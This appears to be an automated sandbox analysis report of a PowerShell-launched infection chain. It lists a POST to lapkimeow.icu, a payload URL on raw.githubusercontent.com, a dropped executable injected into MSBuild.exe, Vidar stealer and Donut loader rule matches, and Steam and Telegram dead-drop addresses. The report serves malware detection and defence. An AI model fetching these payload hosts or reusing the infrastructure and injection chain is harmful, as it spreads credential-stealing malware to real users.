Source: unknown HTTP traffic detected: POST /run HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lapkimeow.icuContent-Length: 31Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E..U...
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C..U...
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0...U.
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0??..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#..
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ifconfig.me
Source: s4xltbnq.rm5.exe, s4xltbnq.rm5.exe, 00000004.00000002.2246764938.00000000038EA000.00000040.00000020.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2318029156.00000000068D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE5D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lapkimeow.icu
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEC591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X..
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC521000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://blockbench.net0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEC591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEC591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEC591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ifconfig.me
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ifconfig.me/ip
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE5D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lapkimeow.icu
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDE5D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lapkimeow.icu/run
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEC591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.1830624059.0000023DDC748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/SashaP20/Get-Doctor/refs/heads/main/unins000.exe
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DED3FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830624059.0000023DDC8D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEFB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE63C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEF0D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0...g?
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe String found in binary or memory: https://t.me/sc1phell
Source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DECF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEC81A000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000000.1793767783.0000000000FD1000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.innosetup.com/
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000008.00000002.2679714287.00000000048BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEDB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DECF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEC81A000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000000.1793767783.0000000000FD1000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54858
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54612 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54733
Source: unknown Network traffic detected: HTTP traffic on port 54725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54612
Source: unknown Network traffic detected: HTTP traffic on port 54824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54749
Source: unknown Network traffic detected: HTTP traffic on port 54858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 54749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54824
Source: unknown Network traffic detected: HTTP traffic on port 54650 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54785
Source: unknown Network traffic detected: HTTP traffic on port 54593 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54623
Source: unknown Network traffic detected: HTTP traffic on port 54741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54595
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54593
Source: unknown Network traffic detected: HTTP traffic on port 54601 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54643 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54719
Source: unknown Network traffic detected: HTTP traffic on port 54798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54633
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54798
Source: unknown Network traffic detected: HTTP traffic on port 54633 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54623 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54848
Source: unknown Network traffic detected: HTTP traffic on port 54694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54769
Source: unknown Network traffic detected: HTTP traffic on port 54690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54643
Source: unknown Network traffic detected: HTTP traffic on port 54686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54689
Source: unknown Network traffic detected: HTTP traffic on port 54595 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54601
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54690
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54650
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54694
Source: unknown Network traffic detected: HTTP traffic on port 54785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54733 -> 443
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.64.30.238:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:54593 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:54595 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 8_2_0040EAB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop, 8_2_00405AD3

System Summary

barindex
Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.s4xltbnq.rm5.exe.51df770.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.s4xltbnq.rm5.exe.38ec502.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 4.2.s4xltbnq.rm5.exe.38ec502.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2246764938.00000000038EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.2648805770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07695768 NtProtectVirtualMemory, 4_2_07695768
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07699540 NtResumeThread, 4_2_07699540
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07694100 NtQueryInformationProcess, 4_2_07694100
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07695760 NtProtectVirtualMemory, 4_2_07695760
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07699538 NtResumeThread, 4_2_07699538
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076940F9 NtQueryInformationProcess, 4_2_076940F9
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EA485 4_2_038EA485
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03ADD33A 4_2_03ADD33A
